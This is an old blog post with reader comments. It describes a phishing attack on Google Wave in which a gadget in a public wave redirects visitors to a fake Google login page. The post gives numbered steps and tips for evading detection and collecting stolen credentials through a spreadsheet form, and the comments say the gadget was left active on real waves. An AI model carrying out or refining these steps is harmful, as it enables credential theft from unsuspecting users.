Tuesday, February 9, 2010

Phishing with Google Wave

Phishing is usually be categorized under social engineering rather than a technical hack. It is inherently about tricking the user to click a link, or visit a web page. However, if the victim is tricked into visiting the phished page, even while they are on a genuine site should be a cause of concern. Since the victim did not initiate to move to the phished page, they are caught off guard.

This post is about a possible attack on Google Wave which could at the least disrupt the wave experience, if not steal the credentials. This attack is similar to the one on Orkut Opensocial that I had published earlier. I am sure someone somewhere would have already figured this out, but I chose to post this anyway since I got some time off FlashPlus, my Google Chrome extension.
The hack can be done by anyone anonymously and on public waves.
  1. Create a phished Google Login page. You could check out tackle.
  2. Search for public waves
  3. Reply to one of the messages, insert a gadget in your reply
  4. The gadget sets the top.location to the phished page.
  5. The victim now visits the wave and opens this unread wave
  6. The gadget kicks in, redirects the user to a phished page
  7. Since the victim was still inside and browsing wave, they may not suspect a phished page. They may think that they were simply logged out.
The following video shows these steps.

A couple of ways to anonymize the attacker could be
  • Make the gadget to set top.location after a window.setTimeout, instead of doing it immediately.
  • Do not redirect all users. Redirect them if a certain cookie is not set. If a cookie is set, they were already phished.
  • Create anonymous accounts on Gmail, host gadget and phished page using Google Gadget Editor on iGoogle. This shows the wave URL on a gmodules.com domain, something that's more believable.
  • Submit credentials from the phished page to a form created using Google spreadsheets.
I am not sure how harmful this hack can get. I have pinged a friend a Google about this.


DucDigital said...

Very interesting, when will they fix this problem. I don't know if their motto "Don't be evil" is true anymore. ha ha

Mark said...

Great stuff, but please stop adding it to random waves: it's just childish.

imma said...

It's pretty harmful when it happens to a wave you're trying to use & it basically blocks you from accessing it. Please remove the gadget now it has been demonstrated, as it is causing rather a lot of damage (still) & someone(maybe not you) is still adding it places ...

lofi said...
This comment has been removed by a blog administrator.
MaXe said...

This is probably the best proof of concept I've seen so far :-) Very good work!

Don't remove the proof of concept just because someone here says you should.

If they have a problem they should contact Google and file a complaint.

Nice work on Tackle as well!

aman said...

excellent fishing video,its so useful for all to understand the phishing.

Post a Comment